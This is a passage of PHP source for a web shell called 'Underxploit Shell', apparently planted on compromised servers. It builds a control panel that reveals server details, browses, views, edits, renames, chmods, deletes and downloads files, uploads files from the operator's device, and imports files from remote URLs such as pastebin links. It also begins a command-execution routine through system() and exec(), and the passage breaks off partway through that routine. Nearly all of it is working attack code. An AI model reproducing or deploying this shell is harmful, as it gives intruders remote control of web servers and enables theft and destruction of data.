var self = this;
var animation = {\'opacity\': 0};
self.$elem.removeClass(\'pressed\');
switch(self.options.position) {
case \'top\':
animation.top = \'+=20\';
break;
case \'left\':
animation.left = \'+=20\';
break;
case \'right\':
animation.left = \'-=20\';
break;
case \'bottom\':
animation.top = \'-=20\';
break;
}
self.toolbar.animate(animation, 200, function() {
self.toolbar.hide();
});
self.$elem.trigger(\'toolbarHidden\');
},
getToolbarElement: function () {
return this.toolbar.find(\'.tool-items\');
}
};
$.fn.toolbar = function( options ) {
if ($.isPlainObject( options )) {
return this.each(function() {
var toolbarObj = Object.create( ToolBar );
toolbarObj.init( options, this );
$(this).data(\'toolbarObj\', toolbarObj);
});
} else if ( typeof options === \'string\' && options.indexOf(\'_\') !== 0 ) {
var toolbarObj = $(this).data(\'toolbarObj\');
var method = toolbarObj[options];
return method.apply(toolbarObj, $.makeArray(arguments).slice(1));
}
};
$.fn.toolbar.options = {
content: \'#myContent\',
position: \'top\',
hideOnClick: false,
zIndex: 120,
hover: false,
style: \'default\',
animation: \'standard\',
adjustment: 10
};
}) ( jQuery, window, document );
</script>
<script type="text/javascript"> baseUrl = window.location.href.split("?")[0]; window.history.pushState("name", "?", baseUrl);</script>
<script type="text/javascript"> var to,width,height,position,autohide,opacity;function notifit_setDefaultValues(){width=400;height=60;position="right";autohide=!0;msg="";opacity=1} function notif(config){notifit_setDefaultValues();if(config.position){if(config.position=="center"||config.position=="left"||config.position=="right"){position=config.position}} if(config.width){if(config.width>0){width=config.width}else if(config.width==="all"){width=screen.width-60}} if(config.height){if(config.height<100&&config.height>0){height=config.height}} if(typeof config.autohide!=="undefined") autohide=config.autohide;var div="<div id=\'ui_notifIt\'><p>"+((config.msg)?config.msg:"")+"</p></div>";$("#ui_notifIt").remove();clearInterval(to);$("body").append(div);$("#ui_notifIt").css("height",height);$("#ui_notifIt").css("width",width);switch(position){case "center":$("#ui_notifIt").css("top",parseInt(0-(height+10)));break;case "right":$("#ui_notifIt").css("right",parseInt(0-(width+10)));break;case "left":$("#ui_notifIt").css("left",parseInt(0-(width+10)));break;default:$("#ui_notifIt").css("right",parseInt(0-(width+10)));break} if(config.opacity){$("#ui_notifIt").css("opacity",config.opacity)} switch(config.type){case "error":$("#ui_notifIt").addClass("error");break;case "success":$("#ui_notifIt").addClass("success");break;case "info":$("#ui_notifIt").addClass("info");break;case "warning":$("#ui_notifIt").addClass("warning");break;default:$("#ui_notifIt").addClass("default");break} switch(position){case "left":$("#ui_notifIt").css("left",parseInt(0-(width*2)));break;case "right":$("#ui_notifIt").css("right",parseInt(0-(width*2)));break;case "center":var mid=window.innerWidth/2;$("#ui_notifIt").css("left",mid-parseInt(width/2));break;default:var mid=window.innerWidth/2;$("#ui_notifIt").css("left",mid-parseInt(width/2));break} $("#ui_notifIt p").css("line-height",height+"px");switch(position){case "center":$("#ui_notifIt").animate({top:10});break;case "right":$("#ui_notifIt").animate({right:10});break;case "left":$("#ui_notifIt").animate({left:10});break;default:$("#ui_notifIt").animate({right:10});break} $("#ui_notifIt").click(function(){notifit_dismiss()});if(autohide==!0) to=setTimeout(function(){notifit_dismiss()},5000)} function notifit_dismiss(){clearInterval(to);if(position=="center"){$("#ui_notifIt").animate({top:parseInt(height-(height/2))},100,function(){$("#ui_notifIt").animate({top:parseInt(0-(height*2))},100,function(){$("#ui_notifIt").remove()})})}else if(position=="right"){$("#ui_notifIt").animate({right:parseFloat(width-(width*0.9))},100,function(){$("#ui_notifIt").animate({right:parseInt(0-(width*2))},100,function(){$("#ui_notifIt").remove()})})}else if(position=="left"){$("#ui_notifIt").animate({left:parseFloat(width-(width*0.9))},100,function(){$("#ui_notifIt").animate({left:parseInt(0-(width*2))},100,function(){$("#ui_notifIt").remove()})})} notifit_setDefaultValues()}</script>
<script type="text/javascript">
(function($) {
$.fn.linedtextarea = function(options) {
var opts = $.extend({}, $.fn.linedtextarea.defaults, options);
var fillOutLines = function(codeLines, h, lineNo) {
while ((codeLines.height() - h) <= 0) {
if (lineNo == opts.selectedLine)
codeLines.append("<div class=\'lineno lineselect\'>" + lineNo + "</div>");
else codeLines.append("<div class=\'lineno\'>" + lineNo + "</div>");
lineNo++
}
return lineNo
};
return this.each(function() {
var lineNo = 1;
var textarea = $(this);
textarea.attr("wrap", "off");
textarea.css({
resize: \'none\'
});
var originalTextAreaWidth = textarea.outerWidth();
textarea.wrap("<div class=\'linedtextarea\'></div>");
var linedTextAreaDiv = textarea.parent().wrap("<div class=\'linedwrap\' style=\'width:" + originalTextAreaWidth + "px\'></div>");
var linedWrapDiv = linedTextAreaDiv.parent();
linedWrapDiv.prepend("<div class=\'lines\' style=\'width:39px\'></div>");
var linesDiv = linedWrapDiv.find(".lines");
linesDiv.height(textarea.height() + 6);
linesDiv.append("<div class=\'codelines\'></div>");
var codeLinesDiv = linesDiv.find(".codelines");
lineNo = fillOutLines(codeLinesDiv, linesDiv.height(), 1);
if (opts.selectedLine != -1 && !isNaN(opts.selectedLine)) {
var fontSize = parseInt(textarea.height() / (lineNo - 2));
var position = parseInt(fontSize * opts.selectedLine) - (textarea.height() / 2);
textarea[0].scrollTop = position
}
var sidebarWidth = linesDiv.outerWidth();
var paddingHorizontal = parseInt(linedWrapDiv.css("border-left-width")) + parseInt(linedWrapDiv.css("border-right-width")) + parseInt(linedWrapDiv.css("padding-left")) + parseInt(linedWrapDiv.css("padding-right"));
var linedWrapDivNewWidth = originalTextAreaWidth - paddingHorizontal;
var textareaNewWidth = originalTextAreaWidth - sidebarWidth - paddingHorizontal - 20;
textarea.width(textareaNewWidth);
linedWrapDiv.width(linedWrapDivNewWidth);
textarea.scroll(function(tn) {
var domTextArea = $(this)[0];
var scrollTop = domTextArea.scrollTop;
var clientHeight = domTextArea.clientHeight;
codeLinesDiv.css({
\'margin-top\': (-1 * scrollTop) + "px"
});
lineNo = fillOutLines(codeLinesDiv, scrollTop + clientHeight, lineNo)
});
textarea.resize(function(tn) {
var domTextArea = $(this)[0];
linesDiv.height(domTextArea.clientHeight + 6)
})
})
};
$.fn.linedtextarea.defaults = {
selectedLine: -1,
selectedClass: \'lineselect\'
}
})(jQuery) </script>';
print '<i class="zmdi zmdi-long-arrow-up zmdi-hc-fw move-top"></i>';
print '<script type="text/javascript">
jQuery(document).ready(function() {
var offset = 250;
var duration = 500;
jQuery(window).scroll(function() {
if (jQuery(this).scrollTop() > offset) {
jQuery(\'.move-top\').fadeIn(duration);
} else {
jQuery(\'.move-top\').fadeOut(duration);
}
});
jQuery(\'.move-top\').click(function(event) {
event.preventDefault();
jQuery(\'html, body\').animate({
scrollTop: 0
}, duration);
return false;
})
}); </script>
<script type="text/javascript">
function c(x) {
window.location = x
} </script>
<script type="text/javascript">jQuery(document).ready(function() {
var offsets=100;
var durations=500;
jQuery(window).scroll(function() {
if(jQuery(this).scrollTop() > offsets) {
jQuery(\'#judul\').fadeIn(durations);
jQuery(\'.menus\').css({\'background\' : \'#222\', \'box-shadow\' : \'0 1px 5px rgba(27,31,35,.15)\'});
}
else {
jQuery(\'#judul\').fadeOut(durations);
jQuery(\'.menus\').css(\'background\', \'none\');
}
}
);
}); </script>
<style> .icon { color: #1D9D73; } </style>
<script type="text/javascript">hljs.initHighlightingOnLoad();</script>
</head>
<body>
<div class="co-ontainer-2">
<div class="atas">
<div class="menus atas-ae" style="background:none">
<div class="co-ontainer-3"><span id="judul" class="">UNDERXPLOIT SHELL 1.4 [ Minimized Version ]</span>
<button class="xa" onclick=\'c("'.$_SERVER['PHP_SELF']. '")\'><i class="zmdi zmdi-home zmdi-hc-fw"></i></button>
<button class="xa" onclick=\'c("?' .x5.getcwd(). '&' .x7. 'about")\'><i class="zmdi zmdi-account-o zmdi-hc-fw"></i></button>
</div>
</div>
</div>
<div class="dir">
<table style="width:100%">
<td style="width:100%">
<div class="dir-pallet">
<table>
<td class="dir-td-left"><span class="label-success">ROOT</span> :</td>
<td class="break dir-td-right wrap">';
foreach($scdir as $c_dir => $cdir) {
print '<a class="a" onclick="c(\'?' . x5;
for ($i = 0; $i <= $c_dir; $i++) {
print $scdir[$i];
switch (true) {
case ($i != $c_dir): print '/';
}
} print '\')">' . $cdir . '</a>/';
}
print '</td></table></div></th></table></div>';
print "<div id='paksa'><table width=100% class='table-info' cellspacing=0>
<th class=th-info style=width:120px>
<center>Component</center>
</th>
<th class=th-info>
<center>Arrow</center>
</th>
<th class=th-info break>
<center>Result</center>
</th>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> Uname</td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'>" . @php_uname() . "</td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> Server IP </td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'>" . gethostbyname($_SERVER['HTTP_HOST']) . "</td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> Your IP </td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'> " . $_SERVER['REMOTE_ADDR'] . "</td>
</tr>
<tr class='ex-hov'>
<td class='td-info'><span class='label label-success'><i class='zmdi zmdi-plus zmdi-hc-fw'></i></span> PHP Version</td>
<td class='td-info' align='center'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i></td>
<td class='td-info'> " . @phpversion() . "</td>
</tr>
</table></div>";
$filez = basename($_UNDERXPLOIT['file']);
$size = filesize("$dir/$filez") / 1024;
$size = round($size, 3);
switch (true) {
case ($size > 1024): $size = round($size / 1024, 2) . ' MB';
break;
default: $size = $size . ' KB';
}
print '<div class="coL">';
switch ($_UNDERXPLOIT['command']) {
case 'download': $dir = $_UNDERXPLOIT['file'];
$file = file_get_contents($dir); ob_end_clean();
header("Content-type: application/octet-stream");
header("Content-length: " . strlen($file));
header("Content-disposition: attachment; filename=" . basename($dir));
print $file;
die();
break;
case 'delete': $delete = unlink($_UNDERXPLOIT['file']);
switch (true) {
case ($delete): print '<script type="text/javascript">c("?' . x5 . $dir . '");</script>';
break;
default: bacot('Permission denied');
}
break;
case 'deledir': $xzi = deledir($dir);
switch (true) {
case '$xzi': print '<script type="text/javascript">window.location = "?' . x5 . dirname($dir) . '";</script>';
break;
default: print '<script type="text/javascript">window.location = "?' . x5 . dirname($dir) . '";</script>';
bacot('Permission denied');
}
break;
case 'view': print '<div class="coL-panel"><table><td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">SOURCE VIEWER</td></table></div><div class="coL-option"><table><td align="center" style="width:30px"><i class="zmdi zmdi-chevron-right zmdi-hc-fw"></i> </td><td class="elip"><span class="label-success">[</span> ' . basename($_UNDERXPLOIT['file']) . ' <span class="label-success">]</span></td><td style="width:90px" class="coL-option-panel" align="center" onclick=\'c("?' . x7 . 'download&' . x5 . $dir . '&' . x6 . $dir . '/' . basename($_UNDERXPLOIT['file']) . '")\'>' . $size . '</td></table><hr>';
print "<table>
<th><button class='coL-btn-option-active'><i class='zmdi zmdi-eye zmdi-hc-fw'></i></button></th>
<th><a onclick=\"c('?" . x7 . "edit&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-edit zmdi-hc-fw'></i></button></a></th>
<th><a onclick=\"c('?" . x7 . "rename&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-file-text zmdi-hc-fw'></i></button></a></th>
<th><a onclick=\"c('?" . x7 . "chmod&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-wrench zmdi-hc-fw'></i></button></a></th>
<th><a onclick=\"c('?" . x7 . "delete&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-delete zmdi-hc-fw'></i></button></a></th></table></div>";
$source = htmlspecialchars(@file_get_contents($_UNDERXPLOIT['file']));
switch (true) {
case (empty($source)): print x9;
bacot('Source not found');
break;
default: print '<div id="paksa"><pre class="top"><code class="php">' . $source . '</code></pre></div></div>';
}
break;
case 'edit': switch (true) {
case ($_UNDERXPLOIT['save']): $save = file_put_contents($_UNDERXPLOIT['file'], $_UNDERXPLOIT['src']);
switch (true) {
case ($save) : bacot('Source saved');
break;
detault: bacot('Permission denied');
}
}
print '<div class="coL-panel"><table><td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">EDIT SOURCE</td></table></div><div class="coL-option"><table><td align="center" style="width:30px"><i class="zmdi zmdi-chevron-right zmdi-hc-fw"></i> </td><td class="elip"><span class="label-success">[</span> ' . basename($_UNDERXPLOIT['file']) . ' <span class="label-success">]</span> </td><td style="width:90px" class="coL-option-panel" align="center" onclick=\'c("?' . x7 . 'download&' . x5 . $dir . '&' . x6 . $dir . '/' . basename($_UNDERXPLOIT['file']) . '")\'>' . $size . '</td></table><hr>';
print "<table>
<th><a onclick=\"c('?" . x7 . "view&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-eye zmdi-hc-fw'></i></button></a></th>
<th><button class='coL-btn-option-active'><i class='zmdi zmdi-edit zmdi-hc-fw'></i></button></th>
<th><a onclick=\"c('?" . x7 . "rename&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-file-text zmdi-hc-fw'></i></button></a></th>
<th><a onclick=\"c('?" . x7 . "chmod&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-wrench zmdi-hc-fw'></i></button></a></th>
<th><a onclick=\"c('?" . x7 . "delete&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-delete zmdi-hc-fw'></i></button></a></th></table></div>";
$source = htmlspecialchars(@file_get_contents($_UNDERXPLOIT['file']));
switch (true) {
case (empty($source)): print "<form method='post' action='?" . x7 . "edit&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "' style='margin:0px'>";
print '<script type="text/javascript">
$(function() {
$(".lined").linedtextarea({selectedLine: 1});
}); </script>';
print "<div id='paksa'><textarea name='src' class='lined' placeholder='// this editor only works for source code.'></textarea><input type='submit' class='btn-exe' value='SAVE' name='save' style='margin-top:3px;width: 100%'></form></div></div>";
break;
default: print "<form method='post' action='?" . x7 . "edit&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "' style='margin:0px'>";
print '<script type="text/javascript">
$(function() {
$(".lined").linedtextarea({selectedLine: 1});
}); </script>';
print "<div id='paksa'><textarea name='src' class='lined' placeholder='// this editor only works for source code.'>" . $source . "</textarea><input type='submit' value='SAVE' name='save' class='btn-exe' style='margin-top:3px;width: 100%'></form></div></div>";
}
break;
case 'rename': switch (true) {
case ($_UNDERXPLOIT['rename']):
$rename = rename($_UNDERXPLOIT['file'], "$dir/" . htmlspecialchars($_UNDERXPLOIT['rename']) . "");
switch (true) {
case ($rename): mtr("?" . x7 . "rename&" . x5 . $dir . "&" . x6 . $dir . "/" . $_UNDERXPLOIT["rename"]);
bacot('File renamed');
break;
default: bacot('Permission denied');
}
}
print '<div class="coL-panel"><table><td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">RENAME FILE</td></table></div><div class="coL-option"><table><td align="center" style="width:30px"><i class="zmdi zmdi-chevron-right zmdi-hc-fw"></i> </td><td class="elip"><span class="label-success">[</span> ' . basename($_UNDERXPLOIT['file']) . ' <span class="label-success">]</span></td><td style="width:90px" class="coL-option-panel" align="center" onclick=\'c("?' . x7 . 'download&' . x5 . $dir . '&' . x6 . $dir . '/' . basename($_UNDERXPLOIT['file']) . '")\'>' . $size . '</td></table><hr>';
print "<table>
<th><a onclick=\"c('?" . x7 . "view&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-eye zmdi-hc-fw'></i></button></a></th>
<th><a onclick=\"c('?" . x7 . "edit&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-edit zmdi-hc-fw'></i></button></a></th>
<th><button class='coL-btn-option-active'><i class='zmdi zmdi-file-text zmdi-hc-fw'></i></button></th>
<th><a onclick=\"c('?" . x7 . "chmod&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-wrench zmdi-hc-fw'></i></button></a></th>
<th><a onclick=\"c('?" . x7 . "delete&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-delete zmdi-hc-fw'></i></button></a></th></table></div>
<div class='coL-option top'><br /><br />
<center>
<i class='zmdi zmdi-file-text zmdi-hc-fw zmdi-hc-4x'></i></center><br /><br /><form action='?" . x7 . "rename&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "' style='margin:0px' method='post'>
<table cellspacing='0'>
<td align='center' style='width:10%'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i> </td><td style='width:70%'><input type='text' value='" . basename($_UNDERXPLOIT['file']) . "' name='rename' id='vrn'></td><td style='width:20%'>
<button type='submit' class='btn-exe' id='rn' onclick='rnm(); return false'><i class='zmdi zmdi-long-arrow-return zmdi-hc-fw'></i></button></td></table>
</form></div></div>";
print '<script type="text/javascript">function rnm(){
if(document.getElementById("vrn").value == ""){'; s('Form do not leave empty');
print 'document.getElementById("vrn").focus();
return false;
} document.getElementById("rn").submit();
} </script>';
break;
case 'chmod': switch (true) {
case ($_UNDERXPLOIT['perm']):
switch (true) {
case (chmod($_UNDERXPLOIT['file'], octdec($_UNDERXPLOIT['perm']))): mtr("?" . x7 . "chmod&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file']);
bacot('Items changed mode to '.decoct(octdec($_UNDERXPLOIT['perm'])));
break;
default: bacot('Permission denied');
}
}
print '<div class="coL-panel"><table><td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">CHMOD FILE</td></table></div><div class="coL-option"><table><td align="center" style="width:30px"><i class="zmdi zmdi-chevron-right zmdi-hc-fw"></i> </td><td class="elip"><span class="label-success">[</span> ' . basename($_UNDERXPLOIT['file']) . ' <span class="label-success">]</span> </td><td style="width:90px" class="coL-option-panel" align="center" onclick=\'c("?' . x7 . 'download&' . x5 . $dir . '&' . x6 . $dir . '/' . basename($_UNDERXPLOIT['file']) . '")\'>' . $size . '</td></table><hr>';
print "<table>
<th><a onclick=\"c('?" . x7 . "view&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-eye zmdi-hc-fw'></i></button></a></th>
<th><a onclick=\"c('?" . x7 . "edit&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-edit zmdi-hc-fw'></i></button></a></th>
<th><a onclick=\"c('?" . x7 . "rename&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-file-text zmdi-hc-fw'></i></button></a></th>
<th><button class='coL-btn-option-active'><i class='zmdi zmdi-wrench zmdi-hc-fw'></i></button></th>
<th><a onclick=\"c('?" . x7 . "delete&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "')\"><button class='coL-btn-option'><i class='zmdi zmdi-delete zmdi-hc-fw'></i></button></a></th></table></div>
<div class='coL-option top'><br /><br>
<center>
<i class='zmdi zmdi-wrench zmdi-hc-fw zmdi-hc-4x'></i></center><br><br />
<form action='?" . x7 . "chmod&" . x5 . $dir . "&" . x6 . $_UNDERXPLOIT['file'] . "' style='margin:0px' method='post'>
<table cellspacing='0'>
<td align='center' style='width:10%'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i> </td><td style='width:70%'>
<input type='number' value='" . substr(sprintf("%o", fileperms($_UNDERXPLOIT['file'])) , -4) . "' name='perm' style='width:100%' id='decoct'></td><td style='width:20%'>
<button id='chcrot' class='btn-exe' onclick='chmod(); return false'><i class='zmdi zmdi-long-arrow-return zmdi-hc-fw'></i></button></td></table>
</form></div></div>";
print '<script type="text/javascript">function chmod(){
if(document.getElementById("decoct").value == ""){'; s('Form do not leave empty');
print 'document.getElementById("decoct").focus();
return false;
} document.getElementById("chcrot").submit();
} </script>';
break;
case 'renadir': $c = $_UNDERXPLOIT['e'];
switch (true) {
case ($_UNDERXPLOIT['e']): $e = rename($dir, "" . dirname($dir) . "/" . htmlspecialchars($_UNDERXPLOIT['e']) . "");
switch (true) {
case ($e): print '<script type="text/javascript">c("?' . x5 . dirname($dir) . '");</script>';
break;
default: bacot('Permission denied');
}
}
print '<div class="coL-panel"><table><td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">RENAME DIRECTORY</td></table></div>';
print "<div class='coL-option top'><br /><br /><center><i class='zmdi zmdi-folder-outline zmdi-hc-fw zmdi-hc-4x'></i></center><br /><br />";
print "<form action='?" . x7 . "renadir&" . x5 . $dir . "' style='margin:0px' method='post'><table cellspacing='0'><td align='center' style='width:10%'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i> </td><td style='width:70%'><input type='text' value='" . basename($dir) . "' name='e' id='vrn'></td><td style='width:20%'><button type='submit' class='btn-exe' onclick='rnm(); return false' id='rn'><i class='zmdi zmdi-long-arrow-return zmdi-hc-fw'></i></button></td></table></form></div></div>";
print '<script type="text/javascript">function rnm(){
if(document.getElementById("vrn").value == ""){'; s('Form do not leave empty');
print 'document.getElementById("vrn").focus();
return false;
} document.getElementById("rn").submit();
} </script>';
break;
case 'chmdir': switch (true) {
case ($_UNDERXPLOIT['perm']):
switch (true) {
case (chmod($dir, octdec($_UNDERXPLOIT['perm']))): mtr("?" . x7 . "chmdir&" . x5 . $dir);
bacot('Directory changed mode to '.decoct(octdec($_UNDERXPLOIT['perm'])));
break;
default: bacot('Permission denied');
}
}
print '<div class="coL-panel"><table><td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">CHMOD DIRECTORY </td></table></div>';
print "<div class='coL-option top'><br /><br /><center><i class='zmdi zmdi-wrench zmdi-hc-fw zmdi-hc-4x'></i></center><br /><br />";
print "<form action='?" . x7 . "chmdir&" . x5 . $dir . "' style='margin:0px' method='post'><table cellspacing='0'><td align='center' style='width:10%'><i class='zmdi zmdi-chevron-right zmdi-hc-fw'></i> </td><td style='width:70%'><input type='number' value='" . substr(sprintf("%o", fileperms($dir)) , -4)."' name='perm' id='decoct'></td><td style='width:20%'><button type='submit' id='chcrot' onclick='chmod(); return false' class='btn-exe'><i class='zmdi zmdi-long-arrow-return zmdi-hc-fw'></i></button></td></table></form></div></div>";
print '<script type="text/javascript">function chmod(){
if(document.getElementById("decoct").value == ""){'; s('Form do not leave empty');
print 'document.getElementById("decoct").focus();
return false;
} document.getElementById("chcrot").submit();
} </script>';
break;
case 'about': print '<div class="coL-panel"><table><td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">ABOUT ME</td></table></div>';
print '<div class="coL-option" style="padding:7px"><br /><br />
<center><i class="zmdi zmdi-shield-check zmdi-hc-4x animated infinite rubberBand"></i></center><br />
<center>
<font size="4px" style="shadow:2px 2px 0px #fff">UNDERXPLOIT SHELL [ Minimized Version ]</font>
<br /><i class="zmdi zmdi-globe-lock zmdi-hc-fw"></i><span class="label-success"> http://' . $_SERVER['HTTP_HOST'] . '</span></center><br /><br />
</div>
<div class="coL-panel top">
<table>
<td class="td-panel">
<center>
<div class="loader"></div>
</center>
</td>
<td class="td-panel-right">CREDITS</td>
</table>
</div>
<div id="paksa"><table class="table-info">
<tr class="ex-hov">
<td style="width:110px" class="td-info"><span class="label label-success"><i class="zmdi zmdi-plus zmdi-hc-fw"></i></span> Name</td>
<td class="td-info">: Underxploit Shell [ Minimized Version ]</td>
<tr class="ex-hov">
<td style="width:110px" class="td-info"><span class="label label-success"><i class="zmdi zmdi-plus zmdi-hc-fw"></i></span> Version</td>
<td class="td-info">: 0.1.4 [ Dark ]</td>
<tr class="ex-hov">
<td style="width:110px" class="td-info"><span class="label label-success"><i class="zmdi zmdi-plus zmdi-hc-fw"></i></span> Author</td>
<td class="td-info">: Wildan Izzudin</td>
<tr class="ex-hov">
<td style="width:110px" class="td-info"><span class="label label-success"><i class="zmdi zmdi-plus zmdi-hc-fw"></i></span> Email</td>
<td class="td-info break">: <a class="a" href="mailto:underxploit@gmail.com">underxploit@gmail.com</a></td>
<tr class="ex-hov">
<td style="width:110px" class="td-info"><span class="label label-success"><i class="zmdi zmdi-plus zmdi-hc-fw"></i></span> Pastebin</td>
<td class="td-info">: <a class="a" href="https://pastebin.com/u/ToKeiChun">ToKeiChun\'s Pastebin</a></td>
</table>
</div>
<div class="coL-option">
<center><br />If there is any suggestion or feedback please contact me through the contact above.<br /><br />
<center><br />— Thank You —</center>
</div>
</div>';
break;
case 'upload': print '<div class="coL-panel"><table>
<td class="td-panel"><center><div class="loader"></div></center></td><td class="td-panel-right">MULTIPLE UPLOAD</td></table></div>';
switch (true) {
case ($_REQUEST['upload']): switch (true) {
case ($_UNDERXPLOIT['upload']): $ff = count($_FILES['file']['name']);
for($i = 0; $i<$ff; $i++) {
$drp = $_FILES['file']['name'][$i];
switch (true) {
case (empty($drp)): continue 2;
break;
}
if (isset($_REQUEST['ufile'][$i])) {
$ufile = $_REQUEST['ufile'][$i];
switch (true) {
case (empty($ufile)): $cx = $_FILES['file']['name'][$i];
break;
default: $cx = $ufile;
}
switch (true) {
case (@copy($_FILES['file']['tmp_name'][$i], $dir . '/' . $cx)): bacot('File uploaded succesfully');
break;
default: bacot('Failed to upload file');
}
}
} break;
} break;
}
print '<script type="text/javascript">
$(document).ready(function() {
var wr1 = $(".input_1");
var add1 = $(".add_1");
var x1 = 1;
$(add1).click(function(e) {
e.preventDefault();
if(x1 < 5) {
x1++;
$(wr1).append(\'<table><td class="tup" style="width:20%">File :</td><td style="width:80%"><input type="file" name="file[]"></td><tr><td class="tup" style="width:20%">Name :</td><td style="width:80%"><input name="ufile[]" type="text" placeholder="( Optional )" value="" /></td></table>\');
} else {
$(".add_1").hide();
}
});
$(wr1).on("click",".remove_field", function(e) {
e.preventDefault(); $(this).parent(\'div\').remove(); x1--;
})
});</script>
<div class="coL-option"><div class="wr"><span class="label-success"><i class="zmdi zmdi-chevron-right zmdi-hc-fw"></i></span> From Device : <button class="lawb add_1" style="width:50px;float:right">Add </button></div><hr>
<form enctype="multipart/form-data" action="?' . x7 . 'upload&' . x5 . $dir . '" method="POST" style="margin:0px">
<div class="input_1">
<table>
<td class="tup" style="width:20%">File :</td>
<td style="width:80%">
<input type="file" name="file[]"></td>
<tr>
<td class="tup" style="width:20%">Name :</td>
<td style="width:80%"><input name="ufile[]" type="text" placeholder="( Optional )" value="" /></td>
</table>
</div>
<table><td style="width:20%"></td>
<td style="width:80%"><input type="submit" name="upload" style="width:100px" value="Upload" class="btn-exe" />
</td>
</table>
</form>
</div>';
if (isset($_UNDERXPLOIT['submit'])) {
$url = count($_UNDERXPLOIT['url']);
for($i = 0; $i < $url; $i++){
$drq = $_UNDERXPLOIT['url'][$i];
switch (true) {
case (empty($drq)): continue 2;
}
switch (true) {
case(empty($_UNDERXPLOIT['uname'][$i])): $ufc = basename($drq);
break;
default: $ufc = $_UNDERXPLOIT['uname'][$i];
}
switch (true) {
case (op($ufc, $drq)): bacot('File imported');
break;
default: bacot('Failed to import file');
}
}
}
print '<script type="text/javascript">
$(document).ready(function() {
var wr2 = $(".input_2");
var add2 = $(".add_2");
var x2 = 1;
$(add2).click(function(e) {
e.preventDefault();
if(x2 < 5) {
x2++;
$(wr2).append(\'<table style="width:100%"><td class="tup" style="width:20%">Link :</td><td style="width:80%"><input type="text" name="url[]" placeholder="https://pastebin.com/raw/M4bJJtBD" style="width:100%"></td><tr><td class="tup" style="width:20%">Name :</td><td style="width:80%"><input type="text" name="uname[]" style="width:100%" placeholder="( Optional )"></td></table>\');
} else {
$(".add_2").hide();
}
});
$(wr2).on("click",".remove_field", function(e) {
e.preventDefault(); $(this).parent(\'div\').remove(); x2--;
})
});</script>
<div class="coL-option top"><div class="wr"><span class="label-success"><i class="zmdi zmdi-chevron-right zmdi-hc-fw"></i></span> From Internet (Import) : <button class="lawb add_2" style="width:50px;float:right">Add </button></div>
<hr>
<form action="?' . x7 . 'upload&' . x5 . $dir . '" method="POST">
<div class="input_2">
<table style="width:100%">
<td class="tup" style="width:20%">Link :</td>
<td style="width:80%"><input type="text" name="url[]" placeholder="https://pastebin.com/raw/M4bJJtBD" style="width:100%"></td>
<tr>
<td class="tup" style="width:20%">Name :</td>
<td style="width:80%"><input type="text" name="uname[]" style="width:100%" placeholder="( Optional )"></td>
</table>
</div>
<table>
<td style="width:20%"></td>
<td style="width:80%"><input type="submit" name="submit" style="width:100px" value="Upload" class="btn-exe"></td>
</table>
</form>
</div>
</div>';
break;
case 'system':
function exe($corey) {
switch (true) {
case (function_exists('system')):
@ob_start();
@system($corey);
$corex = @ob_get_contents();
@ob_end_clean();
return $corex;
break;
case (function_exists('exec')):
@exec($corey, $values);
$corex = "";
foreach($values as $value) {
$corex.= $result;
} return $corex;
break;
